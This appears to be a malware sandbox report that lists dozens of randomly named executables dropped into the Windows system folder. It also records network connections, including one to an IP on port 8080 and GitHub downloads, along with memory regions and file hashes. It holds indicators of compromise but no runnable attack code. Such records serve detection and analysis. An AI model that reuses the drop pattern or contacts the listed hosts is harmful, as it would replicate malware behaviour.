C:\Windows\System\jMYKssJ.exe

C:\Windows\System\CRWdFyJ.exe

C:\Windows\System\CRWdFyJ.exe

C:\Windows\System\HZicGde.exe

C:\Windows\System\HZicGde.exe

C:\Windows\System\pIYRuYx.exe

C:\Windows\System\pIYRuYx.exe

C:\Windows\System\YyoDbtH.exe

C:\Windows\System\YyoDbtH.exe

C:\Windows\System\lVfPbxl.exe

C:\Windows\System\lVfPbxl.exe

C:\Windows\System\nDhBkYp.exe

C:\Windows\System\nDhBkYp.exe

C:\Windows\System\bbFmsFW.exe

C:\Windows\System\bbFmsFW.exe

C:\Windows\System\XKzrCAg.exe

C:\Windows\System\XKzrCAg.exe

C:\Windows\System\zwrUWtj.exe

C:\Windows\System\zwrUWtj.exe

C:\Windows\System\PpJozaX.exe

C:\Windows\System\PpJozaX.exe

C:\Windows\System\xQEHIpM.exe

C:\Windows\System\xQEHIpM.exe

C:\Windows\System\KcWwQYO.exe

C:\Windows\System\KcWwQYO.exe

C:\Windows\System\BtivDWl.exe

C:\Windows\System\BtivDWl.exe

C:\Windows\System\mjIdzTI.exe

C:\Windows\System\mjIdzTI.exe

C:\Windows\System\qLLlyNm.exe

C:\Windows\System\qLLlyNm.exe

C:\Windows\System\Gdvlbhc.exe

C:\Windows\System\Gdvlbhc.exe

C:\Windows\System\srgmTIt.exe

C:\Windows\System\srgmTIt.exe

C:\Windows\System\VIZEZoW.exe

C:\Windows\System\VIZEZoW.exe

C:\Windows\System\VPyNxVN.exe

C:\Windows\System\VPyNxVN.exe

C:\Windows\System\urzZWpP.exe

C:\Windows\System\urzZWpP.exe

C:\Windows\System\qPFIeAk.exe

C:\Windows\System\qPFIeAk.exe

C:\Windows\System\OOheslD.exe

C:\Windows\System\OOheslD.exe

C:\Windows\System\vOyniJm.exe

C:\Windows\System\vOyniJm.exe

C:\Windows\System\VqtqGQn.exe

C:\Windows\System\VqtqGQn.exe

C:\Windows\System\sCPIVXj.exe

C:\Windows\System\sCPIVXj.exe

C:\Windows\System\exTPHtu.exe

C:\Windows\System\exTPHtu.exe

C:\Windows\System\RPqzwVj.exe

C:\Windows\System\RPqzwVj.exe

C:\Windows\System\dZAlgiv.exe

C:\Windows\System\dZAlgiv.exe

C:\Windows\System\rKmFLUM.exe

C:\Windows\System\rKmFLUM.exe

C:\Windows\System\tPwUXiT.exe

C:\Windows\System\tPwUXiT.exe

C:\Windows\System\jklHSfT.exe

C:\Windows\System\jklHSfT.exe

C:\Windows\System\AArGPnM.exe

C:\Windows\System\AArGPnM.exe

C:\Windows\System\VMxdrqx.exe

C:\Windows\System\VMxdrqx.exe

C:\Windows\System\bLBxrTX.exe

C:\Windows\System\bLBxrTX.exe

C:\Windows\System\KaZUVBu.exe

C:\Windows\System\KaZUVBu.exe

C:\Windows\System\UxHNiIq.exe

C:\Windows\System\UxHNiIq.exe

C:\Windows\System\vlDBxCn.exe

C:\Windows\System\vlDBxCn.exe

C:\Windows\System\tuOIhMT.exe

C:\Windows\System\tuOIhMT.exe

C:\Windows\System\oBRmiYg.exe

C:\Windows\System\oBRmiYg.exe

C:\Windows\System\dScWzQf.exe

C:\Windows\System\dScWzQf.exe

C:\Windows\System\YHtOcmV.exe

C:\Windows\System\YHtOcmV.exe

C:\Windows\System\yrljHTb.exe

C:\Windows\System\yrljHTb.exe

C:\Windows\System\VPjNkRA.exe

C:\Windows\System\VPjNkRA.exe

C:\Windows\System\ksdQvcw.exe

C:\Windows\System\ksdQvcw.exe

C:\Windows\System\rrrkPPe.exe

C:\Windows\System\rrrkPPe.exe

C:\Windows\System\FLEygUD.exe

C:\Windows\System\FLEygUD.exe

C:\Windows\System\FwLNYep.exe

C:\Windows\System\FwLNYep.exe

C:\Windows\System\BBTqVcM.exe

C:\Windows\System\BBTqVcM.exe

C:\Windows\System\fDUkZyo.exe

C:\Windows\System\fDUkZyo.exe

C:\Windows\System\BaBKObU.exe

C:\Windows\System\BaBKObU.exe

C:\Windows\System\ZkdlbNL.exe

C:\Windows\System\ZkdlbNL.exe

C:\Windows\System\bnbETxq.exe

C:\Windows\System\bnbETxq.exe

C:\Windows\System\jmmLBfH.exe

C:\Windows\System\jmmLBfH.exe

C:\Windows\System\xYzwvIo.exe

C:\Windows\System\xYzwvIo.exe

C:\Windows\System\CrfGycd.exe

C:\Windows\System\CrfGycd.exe

C:\Windows\System\XVciEkX.exe

C:\Windows\System\XVciEkX.exe

C:\Windows\System\YFtaokY.exe

C:\Windows\System\YFtaokY.exe

C:\Windows\System\pBENwQC.exe

C:\Windows\System\pBENwQC.exe

C:\Windows\System\FDjbBNI.exe

C:\Windows\System\FDjbBNI.exe

C:\Windows\System\gcjoZas.exe

C:\Windows\System\gcjoZas.exe

C:\Windows\System\HjjKGVD.exe

C:\Windows\System\HjjKGVD.exe

C:\Windows\System\rdTokWx.exe

C:\Windows\System\rdTokWx.exe

C:\Windows\System\FDAqEvs.exe

C:\Windows\System\FDAqEvs.exe

C:\Windows\System\RHvPBFO.exe

C:\Windows\System\RHvPBFO.exe

C:\Windows\System\FbNEjSU.exe

C:\Windows\System\FbNEjSU.exe

C:\Windows\System\vyTFtXq.exe

C:\Windows\System\vyTFtXq.exe

C:\Windows\System\WNJHDIg.exe

C:\Windows\System\WNJHDIg.exe

C:\Windows\System\lsUkssl.exe

C:\Windows\System\lsUkssl.exe

C:\Windows\System\ofDgKpv.exe

C:\Windows\System\ofDgKpv.exe

C:\Windows\System\BSdRvrh.exe

C:\Windows\System\BSdRvrh.exe

C:\Windows\System\ARyGItv.exe

C:\Windows\System\ARyGItv.exe

C:\Windows\System\rXApCDv.exe

C:\Windows\System\rXApCDv.exe

C:\Windows\System\VUgwtEP.exe

C:\Windows\System\VUgwtEP.exe

C:\Windows\System\puRSdpt.exe

C:\Windows\System\puRSdpt.exe

C:\Windows\System\kyMCltl.exe

C:\Windows\System\kyMCltl.exe

C:\Windows\System\essYBdw.exe

C:\Windows\System\essYBdw.exe

C:\Windows\System\ucIyKLh.exe

C:\Windows\System\ucIyKLh.exe

C:\Windows\System\rJCtXAd.exe

C:\Windows\System\rJCtXAd.exe

C:\Windows\System\KVIuCJA.exe

C:\Windows\System\KVIuCJA.exe

C:\Windows\System\PCNLFAM.exe

C:\Windows\System\PCNLFAM.exe

C:\Windows\System\gBRyAec.exe

C:\Windows\System\gBRyAec.exe

C:\Windows\System\lmeGKIt.exe

C:\Windows\System\lmeGKIt.exe

C:\Windows\System\wBefgVq.exe

C:\Windows\System\wBefgVq.exe

C:\Windows\System\zVfNFFD.exe

C:\Windows\System\zVfNFFD.exe

C:\Windows\System\FvWIBea.exe

C:\Windows\System\FvWIBea.exe

C:\Windows\System\rxxEtfd.exe

C:\Windows\System\rxxEtfd.exe

C:\Windows\System\pZgAZqa.exe

C:\Windows\System\pZgAZqa.exe

C:\Windows\System\YvlAnQz.exe

C:\Windows\System\YvlAnQz.exe

C:\Windows\System\ALrFwMn.exe

C:\Windows\System\ALrFwMn.exe

C:\Windows\System\KEIqJXn.exe

C:\Windows\System\KEIqJXn.exe

C:\Windows\System\xMYUJsJ.exe

C:\Windows\System\xMYUJsJ.exe

C:\Windows\System\wNhwKfu.exe

C:\Windows\System\wNhwKfu.exe

C:\Windows\System\FZSvSOk.exe

C:\Windows\System\FZSvSOk.exe

C:\Windows\System\aNTDNgP.exe

C:\Windows\System\aNTDNgP.exe

C:\Windows\System\XyPPQjr.exe

C:\Windows\System\XyPPQjr.exe

C:\Windows\System\rIrmVCs.exe

C:\Windows\System\rIrmVCs.exe

C:\Windows\System\weCPyXq.exe

C:\Windows\System\weCPyXq.exe

C:\Windows\System\pxwSEUC.exe

C:\Windows\System\pxwSEUC.exe

C:\Windows\System\FeyMSAR.exe

C:\Windows\System\FeyMSAR.exe

C:\Windows\System\nRKepyX.exe

C:\Windows\System\nRKepyX.exe

C:\Windows\System\tOPIBVe.exe

C:\Windows\System\tOPIBVe.exe

C:\Windows\System\jFDqCQk.exe

C:\Windows\System\jFDqCQk.exe

C:\Windows\System\ywqwCpz.exe

C:\Windows\System\ywqwCpz.exe

C:\Windows\System\dSkherm.exe

C:\Windows\System\dSkherm.exe

C:\Windows\System\gRAaJog.exe

C:\Windows\System\gRAaJog.exe

C:\Windows\System\wPUSpui.exe

C:\Windows\System\wPUSpui.exe

C:\Windows\System\RtEunyw.exe

C:\Windows\System\RtEunyw.exe

C:\Windows\System\oULzmXE.exe

C:\Windows\System\oULzmXE.exe

C:\Windows\System\NbrKIqg.exe

C:\Windows\System\NbrKIqg.exe

C:\Windows\System\haAuPDI.exe

C:\Windows\System\haAuPDI.exe

C:\Windows\System\vAXbXJa.exe

C:\Windows\System\vAXbXJa.exe

C:\Windows\System\cHHTqFO.exe

C:\Windows\System\cHHTqFO.exe

C:\Windows\System\bdpqwhV.exe

C:\Windows\System\bdpqwhV.exe

C:\Windows\System\xhjIRhN.exe

C:\Windows\System\xhjIRhN.exe

C:\Windows\System\HRZYBhs.exe

C:\Windows\System\HRZYBhs.exe

C:\Windows\System\ivisJES.exe

C:\Windows\System\ivisJES.exe

C:\Windows\System\xwzXYhR.exe

C:\Windows\System\xwzXYhR.exe

C:\Windows\System\CqsQmjA.exe

C:\Windows\System\CqsQmjA.exe

C:\Windows\System\NjGFGGn.exe

C:\Windows\System\NjGFGGn.exe

C:\Windows\System\hlHqdrn.exe

C:\Windows\System\hlHqdrn.exe

C:\Windows\System\nBzWCwE.exe

C:\Windows\System\nBzWCwE.exe

C:\Windows\System\vzpOZOw.exe

C:\Windows\System\vzpOZOw.exe

C:\Windows\System\CMinonE.exe

C:\Windows\System\CMinonE.exe

C:\Windows\System\PLFBQUF.exe

C:\Windows\System\PLFBQUF.exe

C:\Windows\System\bnZrbsy.exe

C:\Windows\System\bnZrbsy.exe

C:\Windows\System\vZovaqc.exe

C:\Windows\System\vZovaqc.exe

C:\Windows\System\jfZXOOk.exe

C:\Windows\System\jfZXOOk.exe

C:\Windows\System\CnUHZWJ.exe

C:\Windows\System\CnUHZWJ.exe

C:\Windows\System\UQagAYf.exe

C:\Windows\System\UQagAYf.exe

C:\Windows\System\xIXuHho.exe

C:\Windows\System\xIXuHho.exe

C:\Windows\System\AEOhEix.exe

C:\Windows\System\AEOhEix.exe

C:\Windows\System\imdhqtt.exe

C:\Windows\System\imdhqtt.exe

C:\Windows\System\eybEmsP.exe

C:\Windows\System\eybEmsP.exe

C:\Windows\System\HuvpRXo.exe

C:\Windows\System\HuvpRXo.exe

C:\Windows\System\CsgjJXb.exe

C:\Windows\System\CsgjJXb.exe

C:\Windows\System\xaEyFNz.exe

C:\Windows\System\xaEyFNz.exe

C:\Windows\System\HzOUGRG.exe

C:\Windows\System\HzOUGRG.exe

C:\Windows\System\mhgPvgZ.exe

C:\Windows\System\mhgPvgZ.exe

C:\Windows\System\BdPfmhL.exe

C:\Windows\System\BdPfmhL.exe

C:\Windows\System\ClDCpJV.exe

C:\Windows\System\ClDCpJV.exe

C:\Windows\System\FdCoaJi.exe

C:\Windows\System\FdCoaJi.exe

C:\Windows\System\VCpFxCd.exe

C:\Windows\System\VCpFxCd.exe

C:\Windows\System\ejLYseo.exe

C:\Windows\System\ejLYseo.exe

C:\Windows\System\zgbzXOp.exe

C:\Windows\System\zgbzXOp.exe

C:\Windows\System\wzDOAtO.exe

C:\Windows\System\wzDOAtO.exe

C:\Windows\System\vaOHaIZ.exe

C:\Windows\System\vaOHaIZ.exe

C:\Windows\System\FQeMKYD.exe

C:\Windows\System\FQeMKYD.exe

C:\Windows\System\ErdZXaW.exe

C:\Windows\System\ErdZXaW.exe

C:\Windows\System\TlOSocx.exe

C:\Windows\System\TlOSocx.exe

C:\Windows\System\QHOPNjy.exe

C:\Windows\System\QHOPNjy.exe

C:\Windows\System\UQoZOBa.exe

C:\Windows\System\UQoZOBa.exe

C:\Windows\System\NiTJHbE.exe

C:\Windows\System\NiTJHbE.exe

C:\Windows\System\EVTuuHn.exe

C:\Windows\System\EVTuuHn.exe

C:\Windows\System\rmDcORC.exe

C:\Windows\System\rmDcORC.exe

C:\Windows\System\wLZIGwb.exe

C:\Windows\System\wLZIGwb.exe

C:\Windows\System\kYPoPmV.exe

C:\Windows\System\kYPoPmV.exe

C:\Windows\System\qlOfZXp.exe

C:\Windows\System\qlOfZXp.exe

C:\Windows\System\cKKrquW.exe

C:\Windows\System\cKKrquW.exe

C:\Windows\System\LMidcNe.exe

C:\Windows\System\LMidcNe.exe

C:\Windows\System\NtzdsoZ.exe

C:\Windows\System\NtzdsoZ.exe

C:\Windows\System\YzDJAGq.exe

C:\Windows\System\YzDJAGq.exe

C:\Windows\System\ckKlMnS.exe

C:\Windows\System\ckKlMnS.exe

C:\Windows\System\jHqKsXe.exe

C:\Windows\System\jHqKsXe.exe

C:\Windows\System\CZCQfCT.exe

C:\Windows\System\CZCQfCT.exe

C:\Windows\System\JjGhRom.exe

C:\Windows\System\JjGhRom.exe

C:\Windows\System\FYRZVwZ.exe

C:\Windows\System\FYRZVwZ.exe

C:\Windows\System\nqEbNrk.exe

C:\Windows\System\nqEbNrk.exe

C:\Windows\System\WnEUqim.exe

C:\Windows\System\WnEUqim.exe

C:\Windows\System\cKxmpzz.exe

C:\Windows\System\cKxmpzz.exe

C:\Windows\System\UVnAXAO.exe

C:\Windows\System\UVnAXAO.exe

C:\Windows\System\zhdHewo.exe

C:\Windows\System\zhdHewo.exe

C:\Windows\System\NBTfOPW.exe

C:\Windows\System\NBTfOPW.exe

C:\Windows\System\eZaPepM.exe

C:\Windows\System\eZaPepM.exe

C:\Windows\System\gaqaVdv.exe

C:\Windows\System\gaqaVdv.exe

C:\Windows\System\GjdKoxC.exe

C:\Windows\System\GjdKoxC.exe

C:\Windows\System\JRCvyZh.exe

C:\Windows\System\JRCvyZh.exe

C:\Windows\System\kzkQVJp.exe

C:\Windows\System\kzkQVJp.exe

C:\Windows\System\UmhsvLb.exe

C:\Windows\System\UmhsvLb.exe

C:\Windows\System\UqsmbMq.exe

C:\Windows\System\UqsmbMq.exe

C:\Windows\System\yLPlKIk.exe

C:\Windows\System\yLPlKIk.exe

C:\Windows\System\ugTyXXN.exe

C:\Windows\System\ugTyXXN.exe

C:\Windows\System\PolpGfD.exe

C:\Windows\System\PolpGfD.exe

C:\Windows\System\zKicFRo.exe

C:\Windows\System\zKicFRo.exe

C:\Windows\System\RmywmLR.exe

C:\Windows\System\RmywmLR.exe

C:\Windows\System\psOIThk.exe

C:\Windows\System\psOIThk.exe

C:\Windows\System\UngVXjj.exe

C:\Windows\System\UngVXjj.exe

C:\Windows\System\qslvbAB.exe

C:\Windows\System\qslvbAB.exe

C:\Windows\System\GWjryzS.exe

C:\Windows\System\GWjryzS.exe

C:\Windows\System\UAqvEva.exe

C:\Windows\System\UAqvEva.exe

C:\Windows\System\SQBPiIX.exe

C:\Windows\System\SQBPiIX.exe

C:\Windows\System\KHqdlDy.exe

C:\Windows\System\KHqdlDy.exe

C:\Windows\System\UFBdKNw.exe

C:\Windows\System\UFBdKNw.exe

C:\Windows\System\jlshOcc.exe

C:\Windows\System\jlshOcc.exe

C:\Windows\System\ugzlenC.exe

C:\Windows\System\ugzlenC.exe

C:\Windows\System\VkdEhty.exe

C:\Windows\System\VkdEhty.exe

C:\Windows\System\bMMPPMB.exe

C:\Windows\System\bMMPPMB.exe

C:\Windows\System\JaBbOGU.exe

C:\Windows\System\JaBbOGU.exe

C:\Windows\System\JVGStcL.exe

C:\Windows\System\JVGStcL.exe

C:\Windows\System\PtTxZeu.exe

C:\Windows\System\PtTxZeu.exe

C:\Windows\System\aqMaVEo.exe

C:\Windows\System\aqMaVEo.exe

C:\Windows\System\mWZIYnU.exe

C:\Windows\System\mWZIYnU.exe

C:\Windows\System\JGiuGuZ.exe

C:\Windows\System\JGiuGuZ.exe

C:\Windows\System\UShPLov.exe

C:\Windows\System\UShPLov.exe

C:\Windows\System\PUbgWqG.exe

C:\Windows\System\PUbgWqG.exe

C:\Windows\System\rwiMptR.exe

C:\Windows\System\rwiMptR.exe

C:\Windows\System\mwJKaLY.exe

C:\Windows\System\mwJKaLY.exe

C:\Windows\System\alLDvtD.exe

C:\Windows\System\alLDvtD.exe

C:\Windows\System\RjsOOET.exe

C:\Windows\System\RjsOOET.exe

C:\Windows\System\BRGLGPc.exe

C:\Windows\System\BRGLGPc.exe

C:\Windows\System\vkpTTQF.exe

C:\Windows\System\vkpTTQF.exe

C:\Windows\System\gpsnUoW.exe

C:\Windows\System\gpsnUoW.exe

C:\Windows\System\CxMfWph.exe

C:\Windows\System\CxMfWph.exe

C:\Windows\System\fAZiftJ.exe

C:\Windows\System\fAZiftJ.exe

C:\Windows\System\yRszecm.exe

C:\Windows\System\yRszecm.exe

C:\Windows\System\yDcTCal.exe

C:\Windows\System\yDcTCal.exe

C:\Windows\System\EKdpYSq.exe

C:\Windows\System\EKdpYSq.exe

C:\Windows\System\ZOhcVzu.exe

C:\Windows\System\ZOhcVzu.exe

C:\Windows\System\qwWZXap.exe

C:\Windows\System\qwWZXap.exe

C:\Windows\System\MPdDIXe.exe

C:\Windows\System\MPdDIXe.exe

C:\Windows\System\LXisSTD.exe

C:\Windows\System\LXisSTD.exe

C:\Windows\System\dvoOgYM.exe

C:\Windows\System\dvoOgYM.exe

C:\Windows\System\JnKPFDP.exe

C:\Windows\System\JnKPFDP.exe

C:\Windows\System\rZuTnMk.exe

C:\Windows\System\rZuTnMk.exe

C:\Windows\System\YMlfmqP.exe

C:\Windows\System\YMlfmqP.exe

C:\Windows\System\nnNULyZ.exe

C:\Windows\System\nnNULyZ.exe

C:\Windows\System\eBTAZvv.exe

C:\Windows\System\eBTAZvv.exe

C:\Windows\System\rbVDtdc.exe

C:\Windows\System\rbVDtdc.exe

C:\Windows\System\OAvXvrS.exe

C:\Windows\System\OAvXvrS.exe

C:\Windows\System\ITUWRCo.exe

C:\Windows\System\ITUWRCo.exe

C:\Windows\System\gnBVGnF.exe

C:\Windows\System\gnBVGnF.exe

C:\Windows\System\hroDWTN.exe

C:\Windows\System\hroDWTN.exe

C:\Windows\System\NKnRWkM.exe

C:\Windows\System\NKnRWkM.exe

C:\Windows\System\tTTrrcx.exe

C:\Windows\System\tTTrrcx.exe

C:\Windows\System\yARMyLf.exe

C:\Windows\System\yARMyLf.exe

C:\Windows\System\QTRGeFi.exe

C:\Windows\System\QTRGeFi.exe

C:\Windows\System\xQPPBtQ.exe

C:\Windows\System\xQPPBtQ.exe

C:\Windows\System\MRUDDEB.exe

C:\Windows\System\MRUDDEB.exe

C:\Windows\System\ABUUsAG.exe

C:\Windows\System\ABUUsAG.exe

C:\Windows\System\EnTNDfJ.exe

C:\Windows\System\EnTNDfJ.exe

C:\Windows\System\AiNpzAF.exe

C:\Windows\System\AiNpzAF.exe

C:\Windows\System\QVPnofz.exe

C:\Windows\System\QVPnofz.exe

C:\Windows\System\JcynqAj.exe

C:\Windows\System\JcynqAj.exe

C:\Windows\System\uGGvCDy.exe

C:\Windows\System\uGGvCDy.exe

C:\Windows\System\ReUTkOa.exe

C:\Windows\System\ReUTkOa.exe

C:\Windows\System\tiaMKgB.exe

C:\Windows\System\tiaMKgB.exe

C:\Windows\System\QOQzlVh.exe

C:\Windows\System\QOQzlVh.exe

C:\Windows\System\qYiIZjJ.exe

C:\Windows\System\qYiIZjJ.exe

C:\Windows\System\LKDlKqQ.exe

C:\Windows\System\LKDlKqQ.exe

C:\Windows\System\ESXWlte.exe

C:\Windows\System\ESXWlte.exe

C:\Windows\System\vhPzMlc.exe

C:\Windows\System\vhPzMlc.exe

C:\Windows\System\AdyULxL.exe

C:\Windows\System\AdyULxL.exe

C:\Windows\System\SRTSOth.exe

C:\Windows\System\SRTSOth.exe

C:\Windows\System\IDqxRpH.exe

C:\Windows\System\IDqxRpH.exe

C:\Windows\System\eDYHUXg.exe

C:\Windows\System\eDYHUXg.exe

C:\Windows\System\oupHaZc.exe

C:\Windows\System\oupHaZc.exe

C:\Windows\System\hRyuKJJ.exe

C:\Windows\System\hRyuKJJ.exe

C:\Windows\System\OKLiyhV.exe

C:\Windows\System\OKLiyhV.exe

C:\Windows\System\omyStEW.exe

C:\Windows\System\omyStEW.exe

C:\Windows\System\MacfTPM.exe

C:\Windows\System\MacfTPM.exe

C:\Windows\System\xBnWysz.exe

C:\Windows\System\xBnWysz.exe

C:\Windows\System\yJnVWQW.exe

C:\Windows\System\yJnVWQW.exe

C:\Windows\System\sPmwfYA.exe

C:\Windows\System\sPmwfYA.exe

C:\Windows\System\ZLXPLWB.exe

C:\Windows\System\ZLXPLWB.exe

C:\Windows\System\VbOhhRC.exe

C:\Windows\System\VbOhhRC.exe

C:\Windows\System\VVmVdyV.exe

C:\Windows\System\VVmVdyV.exe

C:\Windows\System\GcDbgEv.exe

C:\Windows\System\GcDbgEv.exe

C:\Windows\System\iEjxlWD.exe

C:\Windows\System\iEjxlWD.exe

C:\Windows\System\IsomKRZ.exe

C:\Windows\System\IsomKRZ.exe

C:\Windows\System\yAuPseA.exe

C:\Windows\System\yAuPseA.exe

C:\Windows\System\EcHYkUy.exe

C:\Windows\System\EcHYkUy.exe

C:\Windows\System\raMXVKO.exe

C:\Windows\System\raMXVKO.exe

C:\Windows\System\NkUEQeq.exe

C:\Windows\System\NkUEQeq.exe

C:\Windows\System\xOPBWJs.exe

C:\Windows\System\xOPBWJs.exe

C:\Windows\System\BLcZwzX.exe

C:\Windows\System\BLcZwzX.exe

C:\Windows\System\tfpRbPK.exe

C:\Windows\System\tfpRbPK.exe

C:\Windows\system32\dwm.exe

"dwm.exe"

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 github.githubassets.com udp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 154.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 193.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 243.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

memory/2848-0-0x00007FF72D1A0000-0x00007FF72D596000-memory.dmp

memory/2848-1-0x000001F0947F0000-0x000001F094800000-memory.dmp

memory/1672-3-0x00007FFEEEFA3000-0x00007FFEEEFA5000-memory.dmp

C:\Windows\System\VzRiJoZ.exe

MD5 7a8453632eb465f00ae107dbe0d9ece0
SHA1 ffe292d43f032ef07997fd8a41f22b20ea1ce951
SHA256 6fb653f8ecd292e91442dfd1c28c6f9bb9493eb8d97df4b79813d3b98dfc69c3
SHA512 2674ca9d5cc672ac4bb4a8a72ec91a4afa678cd73f7e201ba7e7fe0d662cdf460724842a6da07b1db1920a77657a67a9c3b524fe3e40ea37629454b6ad0edf4c

C:\Windows\System\zkvquNG.exe

MD5 539b6e05d6fcab81cde35d19005fa5a0
SHA1 f2b24ebab12c968084b3422cda85d71bd83f2208
SHA256 3cc33be963f0ca88328d686274ed57201e24a28f375197823f273a1a777e4946
SHA512 9c2be88674f29e3afd0706b907150dd0484abeecc4da004982e121457a20f86dc95b2bbc986f96a0dc7bcdbee7b3177e2a39b3f8276a917c4823fbf6616d83d5

C:\Windows\System\ZASDHLY.exe

MD5 0b187b5f27130cb869aee34f32289f90
SHA1 7948aa8e24a13843b73a1f52845cd41aa52cf450
SHA256 6d0a71068e0fdf38cd1a680e19562670fa4d790d5f81c70da1bb082a59efcb49
SHA512 ecc63eefa3af5d0d0de02a54f47efca7d1ceb87aa120a5860b263a8aa5c00175e25f5e113f00578a6e012b00ad604074eb841839ae5d45bd63fca2dbb54a7e59

C:\Windows\System\NTirKXC.exe

MD5 bf8399f74271c4ba3846e8754120a3c5
SHA1 31d5b212a7900cc2d4f1ea8ab2920268c02c42aa
SHA256 46fea39e5111603589d2d36824dab6f37219d794751c5151574e6a5853d9e019
SHA512 f75aaea72bf00ddbe1a599d32914cd1e12ea339c58bb32f1d0e685900851f4caa72828474d0ac5e9bae2dfeede51375da7fe4e398d97e7542a6f47874fde5bca

memory/804-61-0x00007FF7B8C40000-0x00007FF7B9036000-memory.dmp

C:\Windows\System\vXeLESQ.exe

MD5 26d5c82e339ebef24c4590df344b30fb
SHA1 ba0326e345ba652812656bcb5dcec94d499b7601
SHA256 01fa1ffe29c16af9a7d3db6c3e4f0a11db2f71858ef05c3ccb369a16a394c9c6
SHA512 3f26669756ca864bd123ed0c2e7030c40f5f565518304c9fa0e49c259cc055dea5a32baee1760a692536a4019f95dffa6002d0bfe217ff9a68f6ec9fae2c665f

C:\Windows\System\DQdwpES.exe

MD5 26cb491f75d3fa09997b68fa73f2ab47
SHA1 7d5c4ea4dd78afb91586b72ccb0cf01003f4fb63
SHA256 945f7293e411fdba45b23dadd646fa37531b7cb57b4b0b3bf773f0d72426f8fa
SHA512 bc9dfeb31b76cb8546efadae9ff584fbf8bc2d8e3b773ae2823a44863a8613e8f34a9554fe0dffeac8034957dbd71151a30def63e7a716f3b595abee31d45cba

C:\Windows\System\YhrpLxc.exe

MD5 a6c07c63f8ad263c6c438645b24d1302
SHA1 45733742169f18acb201e6f34a307d03657cca05
SHA256 f099eb16dc32a33fcb92c4a58c93b86a35130c982d99e4a43b288a27dc5a9e07
SHA512 608d6d265bd8e717aa717dc7edccbe2bdd78104ac95ceb99bdae8288926ca7a2901dcf618e0cc6e9162b1b0db968afb6492342bc9ffcfec0b9d6d32b5f5723fd

memory/4968-83-0x00007FF7ABA00000-0x00007FF7ABDF6000-memory.dmp

memory/704-85-0x00007FF6D7EF0000-0x00007FF6D82E6000-memory.dmp

memory/4204-87-0x00007FF73B9B0000-0x00007FF73BDA6000-memory.dmp

memory/1164-86-0x00007FF787740000-0x00007FF787B36000-memory.dmp

memory/3428-84-0x00007FF777960000-0x00007FF777D56000-memory.dmp

memory/4932-80-0x00007FF71E010000-0x00007FF71E406000-memory.dmp

memory/1244-75-0x00007FF6622A0000-0x00007FF662696000-memory.dmp

C:\Windows\System\RfZqoFO.exe

MD5 e14e686216adfcff87efe2dd2fb673c6
SHA1 2e60371e2bcd8f0b34c244b5e101e53c8ff65dde
SHA256 ad0c04edbb8b4aa647b66a0100ef43d7e515570e430079b527bf59b34a0ff961
SHA512 d8918b0a5a424ba07924c2ec751e8e5238a0cd6cac445060748dd86c480137460be1270348fc4af214d84742a6ccc0b7bba7e8b21e3837fb311dddd3db13aff1

C:\Windows\System\IoPasPV.exe

MD5 fa00b4b9bd0a1e1276d9242d19c2fff1
SHA1 8f6658e889230824941f8f7c58b09386d99281d7
SHA256 50acc2ce7037277dc99e15f3c09727ab1d30d13811f74c7ec949e14d31f528ec
SHA512 6017e7686b92dcef88376cfbc8c7b3d543fde4aec856733c32e515c2f22e9849f52cb3cad655b5939c427c917a0bd1305553480837eb34093cb59d97a0442ef3

memory/4772-66-0x00007FF6A1220000-0x00007FF6A1616000-memory.dmp

memory/368-65-0x00007FF7C1270000-0x00007FF7C1666000-memory.dmp

memory/1672-56-0x00007FFEEEFA0000-0x00007FFEEFA61000-memory.dmp

memory/1672-54-0x0000014A6C870000-0x0000014A6C892000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o5q3s2yp.1mh.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Windows\System\ohQpMmK.exe

MD5 9695207c1585ba2dff61ec2d13be9c74
SHA1 3321379440c2fc270bc097569ce97530b311f7c9
SHA256 3abbc57284369e5b2f8ad5949accfaf474f3f31d4e7c341fb45dd98882d110e8
SHA512 f98ff0363c10fa81eb8d01311912d0ef11d69df84c79d26bbe2c4e1e1af185e83fafdd04bfb939d3df82d1c54d0133e39d5c78e8a5b838fd6a5c16c6c2cc0822

C:\Windows\System\hkAJvxn.exe

MD5 5d80d2568e548c16db5ae2ca53376989
SHA1 2ad702259ad873a161124ce9b0a1cb697ec2adb0
SHA256 a8645c6f25b6dd8605f3311bab2667f43147b1ce77bd23994819625d3103d5b3
SHA512 6317d699306ba22fa7a7036b4eaa01b70df4a46d02daba4fac1f61296cf58aaf8edc03118d4f3b5bcc28352eb68613bf83ddddb7115ab8102b8c0f69e087c23f

memory/4840-21-0x00007FF678940000-0x00007FF678D36000-memory.dmp

memory/3492-17-0x00007FF737DF0000-0x00007FF7381E6000-memory.dmp

memory/1672-9-0x00007FFEEEFA0000-0x00007FFEEFA61000-memory.dmp

C:\Windows\System\JNjawlY.exe

MD5 64c3224d91a6562d216329cde0974e0d
SHA1 cf9caa0f0858c29b8099dd3c87e62f6ff5f83bcd
SHA256 9717bd538c541173bce63987b3aec64ed8916be5fb456c3467a9f2c458160d0d
